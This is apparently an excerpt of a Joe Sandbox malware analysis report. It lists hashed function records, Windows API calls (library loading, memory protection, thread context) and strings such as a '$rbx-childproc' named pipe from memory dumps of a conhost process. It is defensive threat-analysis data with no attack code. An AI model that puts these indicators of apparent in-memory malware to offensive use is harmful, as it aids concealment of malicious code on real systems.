        • Instruction ID: bc466d58f7156998a3addad7542c62e15755a8a3fee443b59fd5f210c167d2c0
        • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
        • Instruction Fuzzy Hash: 45115131A14740C3F7248B65F41479A7B61F389BD5F940329FA5902BA9DF3CC246CB41
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
        • String ID: \\.\pipe\$rbx-childproc
        • API String ID: 166002920-1828357524
        • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
        • Instruction ID: 7865197b1631c4c4fb60af6e90d380383a69c677d2d4cbe4d70cc52513de012d
        • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
        • Instruction Fuzzy Hash: 10115431A14740C3E7148BA5F49439ABB61F385BD4F544329FA5902B99CF7CC245CB41
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
        • String ID:
        • API String ID: 190073905-0
        • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction ID: 58d3bfe895878512ed9e7b4c8ec118540dc7ea73621a1efbb21f8eb22ae1ce72
        • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction Fuzzy Hash: E381C330E1064186FA6C9BED98413D96E93AB867C8F54463DF90947397DB3CCB678702
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
        • String ID:
        • API String ID: 190073905-0
        • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction ID: bbb6c0683f759deb6f0e1bc1c54bccf698b1ac8305fb3418f744727dab93c578
        • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction Fuzzy Hash: DF81B831E2469085FA5C9FED98413D95E93AB86B84F44403DFD8857397DABCCB4B8702
        APIs
        Memory Dump Source
        • Source File: 00000013.00000003.2617755503.0000013F081C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013F081C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_3_13f081c0000_conhost.jbxd
        Similarity
        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
        • String ID:
        • API String ID: 190073905-0
        • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction ID: bc38bb2d8947d847f2fbd68ab32f43eef4ccafab8e3ebb3f46e74473c95c3809
        • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction Fuzzy Hash: 68816F71E0024146F65CAB6ED8413D96E93AF86780FA4983DFA4A477D7DBB8C7478B00
        APIs
        • LoadLibraryExW.KERNEL32(?,?,?,0000013F08E69C6B,?,?,?,0000013F08E6945C,?,?,?,?,0000013F08E68F65), ref: 0000013F08E69B31
        • GetLastError.KERNEL32(?,?,?,0000013F08E69C6B,?,?,?,0000013F08E6945C,?,?,?,?,0000013F08E68F65), ref: 0000013F08E69B3F
        • LoadLibraryExW.KERNEL32(?,?,?,0000013F08E69C6B,?,?,?,0000013F08E6945C,?,?,?,?,0000013F08E68F65), ref: 0000013F08E69B69
        • FreeLibrary.KERNEL32(?,?,?,0000013F08E69C6B,?,?,?,0000013F08E6945C,?,?,?,?,0000013F08E68F65), ref: 0000013F08E69BD7
        • GetProcAddress.KERNEL32(?,?,?,0000013F08E69C6B,?,?,?,0000013F08E6945C,?,?,?,?,0000013F08E68F65), ref: 0000013F08E69BE3
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Library$Load$AddressErrorFreeLastProc
        • String ID: api-ms-
        • API String ID: 2559590344-2084034818
        • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
        • Instruction ID: cbb7e0c3d577a3369309231917845af64c5e54c8c93f8bb06b908fe720062e5c
        • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
        • Instruction Fuzzy Hash: 6F31D231A12A4081EE29AB8AA8003E52F96F745BE0F5D0539FD194B797DF3CC6668306
        APIs
        • LoadLibraryExW.KERNEL32(?,?,?,0000013F08E99C6B,?,?,?,0000013F08E9945C,?,?,?,?,0000013F08E98F65), ref: 0000013F08E99B31
        • GetLastError.KERNEL32(?,?,?,0000013F08E99C6B,?,?,?,0000013F08E9945C,?,?,?,?,0000013F08E98F65), ref: 0000013F08E99B3F
        • LoadLibraryExW.KERNEL32(?,?,?,0000013F08E99C6B,?,?,?,0000013F08E9945C,?,?,?,?,0000013F08E98F65), ref: 0000013F08E99B69
        • FreeLibrary.KERNEL32(?,?,?,0000013F08E99C6B,?,?,?,0000013F08E9945C,?,?,?,?,0000013F08E98F65), ref: 0000013F08E99BD7
        • GetProcAddress.KERNEL32(?,?,?,0000013F08E99C6B,?,?,?,0000013F08E9945C,?,?,?,?,0000013F08E98F65), ref: 0000013F08E99BE3
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Library$Load$AddressErrorFreeLastProc
        • String ID: api-ms-
        • API String ID: 2559590344-2084034818
        • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
        • Instruction ID: a18985252ef3edf6a851d83ddb1dca33b8ed87cc749b1fd8e85daac6ebc6c706
        • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
        • Instruction Fuzzy Hash: 3B311231A02B80C1EE19AB8A98003E56F96B745BA0F59053CFD9D47793EF7CC606C306
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
        • String ID: CONOUT$
        • API String ID: 3230265001-3130406586
        • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
        • Instruction ID: 690052e63b550191830be9ebf8626ea8a399a71039ecc004b53aeab5a6de32c6
        • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
        • Instruction Fuzzy Hash: 0A119031B10F4082E7688B9AE8547596BA2F388BE4F400238FA5E87B95DF3CC6058741
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
        • String ID: CONOUT$
        • API String ID: 3230265001-3130406586
        • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
        • Instruction ID: 80c2b6a9e28103125dec7d598a38dbe6a0972cd768721bb13ca4962e299bdd06
        • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
        • Instruction Fuzzy Hash: A4119331B10B40C2E7548BDAE85475AAAA1F388FF4F404238FA5D87BA5CF3CD6058741
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Thread$Current$Context
        • String ID:
        • API String ID: 1666949209-0
        • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
        • Instruction ID: 537ddf30648d4c2d7a44bc6e95cfe549e430ea49278c419fc20f448c823155ca
        • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
        • Instruction Fuzzy Hash: 46D1AE36614F8885DA74DB4AE49439E7BA1F7D8B88F100226EA8D477B6CF3CC655CB01
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Thread$Current$Context
        • String ID:
        • API String ID: 1666949209-0
        • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
        • Instruction ID: f0d63cc57cf04dfc642858e7f01280d443280659947f9e26885c173f40200a21
        • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
        • Instruction Fuzzy Hash: 1CD18D76604B8881DA74DB5AE49439A7BA1F3D8B88F100126EECD477B6DF7CC652CB01
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Free$CurrentThread
        • String ID:
        • API String ID: 564911740-0
        • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
        • Instruction ID: 6b385fcda49ae4c1c5ed49bcbf28ce52ae76f95c7e1b15668f16738804775df5
        • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
        • Instruction Fuzzy Hash: 3C517431A01B4595EE1D9BADD8512D83BA2BB04788F840939F62D067A7EF7CC727C346
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Free$CurrentThread
        • String ID:
        • API String ID: 564911740-0
        • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
        • Instruction ID: 5cdf3b258975b40943ee960dba912c33897a440bc565dffd740ee5262b3150dc
        • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
        • Instruction Fuzzy Hash: 2451BB31A01B85A5EF0D9B9DD8512D93B62BB04744F440839FA6D063A6EFBCCB1AC746
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$AllocFree
        • String ID: $rbx-
        • API String ID: 756756679-3661604363
        • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
        • Instruction ID: a4769114bc517b3848b0b9af6c2565d933254e984f544f6f22cc782a5dfaaf0d
        • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
        • Instruction Fuzzy Hash: 0A31A231B01B5192EA29DF9AD5403ADABA2FB54BC4F084038EF5907B56EF3CC6728701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$AllocFree
        • String ID: $rbx-
        • API String ID: 756756679-3661604363
        • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
        • Instruction ID: b2cd68a352fd82a9a42ef0ef3c40a9da413980e6b1ca8e99e4f23c5f2ab5b8eb
        • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
        • Instruction Fuzzy Hash: DF31C432B01B9192E718CF9AD5403A9EBA2FB54B84F085038EF9947757EF7CD6628701
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: ErrorLast$Value$FreeHeap
        • String ID:
        • API String ID: 365477584-0
        • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
        • Instruction ID: 324aa47008ed4888e14accf744bb9e67e3b23562f74d280973f2828beb3b8a7f
        • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
        • Instruction Fuzzy Hash: 83113D31B04640C2FA1C67BAB8113EE2A53AB857D0FA4463CF86A567C7CE3CD6234702
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: ErrorLast$Value$FreeHeap
        • String ID:
        • API String ID: 365477584-0
        • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
        • Instruction ID: a4d0ef141a8a1ad4b95b4f5fe985f4c17308c55216fce95e2d9834c974a172ae
        • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
        • Instruction Fuzzy Hash: D4113A31B0169082FA1C77F9A9513EE1A53AB85B90F68463CFCAA563C7CE6CD6034202
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
        • String ID:
        • API String ID: 517849248-0
        • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
        • Instruction ID: 90ae191381c9755cd8fca52df00ca19f8d19ae3b26cba7903aa6c1953b3a5c31
        • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
        • Instruction Fuzzy Hash: A001ED31B14B8086FB28DB56E85879967A2F788FD0F484039EE5D43755DE3CC686C741
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
        • String ID:
        • API String ID: 517849248-0
        • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
        • Instruction ID: 85d1de4976a73203d4d594c03d28c3810873dd103db496e23c046ab074ad2b3e
        • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
        • Instruction Fuzzy Hash: D4018431B00B8196EB18DB96A494399A7A2F788FD0F484039EE9D43755DF7CCA46C741
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
        • String ID:
        • API String ID: 449555515-0
        • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
        • Instruction ID: aea703ebb3aca2ef8898bc70abe5816b1478e7e2b8660eeb20f9ee16a3cca2c3
        • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
        • Instruction Fuzzy Hash: CD012175B11B40C2FB2C9BA9E8487997BA2BB46B85F04003CE94D06356EF3DC65AC702
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
        • String ID:
        • API String ID: 449555515-0
        • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
        • Instruction ID: 99c38f5c98d9411b5837f339c2cde23e8ba47f7c6757f3470eb21fd0d0568f95
        • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
        • Instruction Fuzzy Hash: 73015E35A01740D2EB289BE9E4983967AA2AB45B51F14003CED8D06356EF3DC64A8706
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
